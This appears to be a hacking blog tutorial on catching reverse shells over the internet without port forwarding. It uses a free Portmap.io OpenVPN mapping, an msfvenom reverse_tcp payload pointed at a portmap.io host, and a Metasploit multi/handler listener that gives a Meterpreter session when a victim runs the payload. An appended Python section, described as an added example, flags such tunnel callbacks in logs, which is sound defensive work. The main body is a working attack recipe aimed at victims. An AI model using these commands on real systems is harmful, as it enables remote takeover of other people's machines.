Because most ISPs don't provide port forwarding, hacking over WAN was a difficult task until a few years ago. Later, SSH tunneling and premium VPNs emerged as alternatives to port forwarding and let hackers work over WAN.
Ngrok serves as a leading SSH tunneling provider, but its problem is a lack of persistence: each time you reconnect, you are given a random subdomain.
To overcome this, Serveo.net introduced a "Unique Subdomain" feature that lets its users choose their own subdomain. Serveo.net, though, never reached as many users as ngrok did.
The problem with paid VPNs is their cost. Although they provide a port forwarding facility, they cost more. Now, Portmap.io offers free port mapping configurations that can be used with OpenVPN for port forwarding and for performing penetration tests over WAN.
Things you’ll need before proceeding :
- OpenVPN
- Portmap.io Account
Hack on WAN Without Port Forwarding using Portmap.io :
- Install and configure OpenVPN in Kali Linux.
- Now, log in to your Portmap.io account.
- After logging in, click on "Create New Configuration".
- Choose a name for your configuration. (In the free portmap.io plan, you can configure only one mapping, so choose it wisely. You have to pay and subscribe for more.)
- Default type is “Open VPN”
- Change the protocol to "TCP" if it is set to UDP by default.
- Add a comment if you wish; otherwise leave the box empty.
- Now, click on "Generate" to generate the configuration file.
- After generation, download the configuration file.
- After downloading, click "Create" to create the file. (You can download before creation.)
- Now that we have successfully created our configuration file, navigate to "Mapping Rules" and click "Create a New Rule".
- Now, configure the Rule as given in the image below
- All the values will be filled by default, all you have to do is choose the port to forward.
- In my case, I’ve selected to forward port 4444. You can choose your own.
- After entering the port of your choice, click on "Create" to create the mapping rule.
- When creating the payload, "ak-36101.portmap.io" will serve as LHOST and 53723 will serve as LPORT.
- Now, to connect to the VPN, type "openvpn <name of config file you have downloaded>"
- Ex : openvpn thoatta.port4444.ovpn
- Now, the VPN connection will be initiated and you'll be connected to the VPN.
- After successful VPN connection, leave the terminal running in the background.
- If you close it, the connection will be terminated.
- Now, you'll be assigned a new IP address on the tun0 interface.
- The IP address of the tun0 interface will be used to create the listener, whereas the host name in the mapping rule will be used to create the payload.
- Now, to create a payload with msfvenom, type
- msfvenom -p <payload/reverse_tcp> LHOST=ak-36101.portmap.io LPORT=53723 R > /root/Desktop/payload_name
- After successful payload creation, to create the listener in Metasploit, type
- use exploit/multi/handler
- set payload <payload/reverse_tcp>
- set lhost <IP of tun0 interface>
- Ex : set lhost 10.9.27.6
- set lport <port you’ve selected in mapping rule>
- Ex : set lport 4444 (In my case, I’ve selected port 4444 to forward in mapping rule)
- Now, the exploit will be launched successfully and you'll get a Meterpreter session once the payload you created has been executed by the victim.
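Seen from the defender's side, the callback configured above is an outbound TCP connection from the victim host to a "*.portmap.io" name on a non-web port (53723 here). The following is an added example, not part of the original article, that correlates DNS and connection logs to flag it; the log format, the sample lines and the "ngrok.io" suffix are assumptions constructed for illustration.

```python
import re

# Tunnelling/port-mapping services named in the article. "ngrok.io" is an
# assumption (the article names ngrok but not its domain); extend as needed.
TUNNEL_SUFFIXES = ("portmap.io", "serveo.net", "ngrok.io")
WEB_PORTS = {80, 443}

# Constructed sample logs in a hypothetical key=value format (not from the
# article). IP addresses are taken from the RFC 5737 documentation ranges.
DNS_LOG = """\
2024-05-01T10:00:01 client=192.168.1.23 query=ak-36101.portmap.io answer=203.0.113.50
2024-05-01T10:00:02 client=192.168.1.40 query=www.example.org answer=198.51.100.7
2024-05-01T10:00:03 client=192.168.1.40 query=notportmap.io answer=198.51.100.9
"""
CONN_LOG = """\
2024-05-01T10:00:02 src=192.168.1.23 dst=203.0.113.50 dport=53723 proto=tcp
2024-05-01T10:00:04 src=192.168.1.40 dst=198.51.100.7 dport=443 proto=tcp
2024-05-01T10:00:05 src=192.168.1.40 dst=198.51.100.9 dport=8443 proto=tcp
"""

KV = re.compile(r"(\w+)=(\S+)")

def parse(log):
    """Turn 'timestamp key=value ...' lines into dicts (timestamp under 'ts')."""
    return [dict(KV.findall(l), ts=l.split()[0]) for l in log.splitlines() if l.strip()]

def is_tunnel_name(name):
    """Match the suffix on a label boundary so 'notportmap.io' is not flagged."""
    name = name.lower().rstrip(".")
    return any(name == s or name.endswith("." + s) for s in TUNNEL_SUFFIXES)

def find_tunnel_callbacks(dns_log, conn_log):
    """Correlate DNS answers for tunnel names with non-web connections to them."""
    resolved = {}  # (client IP, answer IP) -> queried tunnel host name
    for r in parse(dns_log):
        if is_tunnel_name(r["query"]):
            resolved[(r["client"], r["answer"])] = r["query"]
    alerts = []
    for c in parse(conn_log):
        name = resolved.get((c["src"], c["dst"]))
        if name and int(c["dport"]) not in WEB_PORTS:
            alerts.append((c["ts"], c["src"], name, int(c["dport"])))
    return alerts

if __name__ == "__main__":
    for alert in find_tunnel_callbacks(DNS_LOG, CONN_LOG):
        print("possible reverse-shell callback:", alert)
```

Only the first connection is reported: the second goes to a web port on an unrelated name, and the third resolves a look-alike domain that does not sit under a listed suffix.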
If you have any comments, please leave them in the comment box below and share the article if you like 🙂